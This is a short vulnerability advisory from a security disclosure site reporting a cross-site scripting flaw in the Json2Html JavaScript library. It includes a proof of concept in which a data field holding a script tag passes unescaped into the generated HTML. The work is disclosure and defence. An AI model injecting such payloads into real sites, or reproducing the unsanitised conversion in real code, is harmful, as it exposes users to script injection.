Json2Html Cross Site Scripting

2016.06.17
Credit: David Silveiro
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Json2Html Javascript Library - Reflective/Persistant XSS # Date: 0 day # Exploit Author: David Silveiro # Exploit Author Github: github.com/davidsilveiro # Vendor Homepage: http://json2html.com/ # Software Link: https://github.com/moappi/json2html/archive/master.zip # Platorm: Javascript Json2Html is a pure javascript library that transforms json to html and is used as a Jquery plugin, as well as a Node.js package. The issue lyes with there being no sanitization when the conversion between the two occures. For example; Proof of concept: var transform = {'<>':'li','html':'${name} (${age})'}; var data = [ {'name':'Bob','age':40}, {'name':'<script>alert('XSS')</script>','age':34} ]; and then transformed... <html> <li> Bob (40) </li> <li> <script>alert('XSS')</script> (34) </li> </html>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top